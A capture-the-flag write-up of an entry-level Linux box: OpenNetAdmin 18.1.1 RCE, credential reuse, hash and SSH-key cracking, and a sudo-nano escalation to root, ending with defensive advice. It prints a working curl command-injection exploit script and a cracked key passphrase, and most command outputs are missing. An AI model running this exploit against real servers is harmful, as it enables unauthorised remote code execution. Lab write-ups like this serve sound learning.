TL;DR

We discover a website that contains a broken login page link that gives access to an OpenNetAdmin instance. The installed version has a known RCE vulnerability that we exploit to get jimmy password. We log in through SSH and discover an internal website that gives out joanna SSH private-key if we can log in. We find the SHA512 hash in the source code that we easily crack. We get the private-key that is encrypted. We crack it with john and log in as joanna to get the user flag. joanna is a sudoer and can run nano with root privileges. Once in nano we can execute commands to get a root shell and grab the root flag.

Reconnaissance & Enumeration

Open Ports

An NMAP scan shows the following (partial) output:

We discover the usual OpenSSH and Apache servers on their respective default ports.

Web discovery

The landing page is the default Apache2 page. A gobuster file/directory scan discovers 3 different websites:

Artwork and Sierra propose different services for start-ups. The content is, for the most part, static, except for a contact form. Music, proposes music downloads for artists and is the only with a login page:

However, the login page does not seem properly configured as it gives access to /ona, an instance of OpenNetAdmin v18.1.1 (see the page title), a tool to manage IP inventories:

There is a public vulnerability impacting this tool and the version that is running:

Gaining Access

The content of the exploit 47691.sh is short:

1
2
3
4
5
6

#!/bin/bash
URL="${1}"  
while true;do  
 echo -n "$ "; read cmd  
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1  
done

This will output a pseudo-shell where we can send commands and get the results. On macOS, the built-in head command does not support the -n flag with negative values. We can use ghead instead (brew install coreutils), and the command becomes:

By exploring the website files, we find some credentials in the database configuration file:

There are 2 users on the system: joanna and jimmy. The password is jimmy’s and we get SSH access.

Local Reconnaissance & Enumeration

There is an internal website listening on port 52846:

The content is pretty simple, there is a login page where we see that only jimmy is allowed to log in:

The SHA512 hash does not correspond to jimmy password. Once logged-in, we access joanna SSH private-key:

Privilege Escalation

User pivoting

We can crack the SHA512 hash online:

And retrieve the private-key:

The redirection to /main.php does not seem to work though…but we get the session cookie that we can use:

We grab the encrypted private-key of joanna. There is one last message at the bottom of the page:

We save the key and prepare it for cracking with ssh2john.py:

Then we crack it with john:

The password is: bloodninjas. We log in through SSH and get the user flag:

Root escalation

The escalation to root is fairly simple. joanna is a sudoer and can run nano as root:

GTFObins has the solution to spawn a shell as root:

Conclusion

This was an entry-level Linux box with no particular difficulty and a good one, in my opinion, to start pentesting. It requires basic enumeration, password/key cracking, usage of public exploits and knowledge of basic privilege escalation techniques.

As usual, here are some takeaways:

• do not expose management tools without strong authentication and make sure your tooling is up to date,
• enforce a strong password policy, password and keys managers, MFA and don’t re-use passwords,
• avoid playing with sudo configuration if you are not sure of what you do and how it can be abused. Have a look at GTFObins to start with…

Resources

[1] OpenNetAdmin
https://opennetadmin.com/

[2] CrackStation
https://crackstation.net/

[3] GTFObins - Nano
https://gtfobins.github.io/gtfobins/nano/#sudo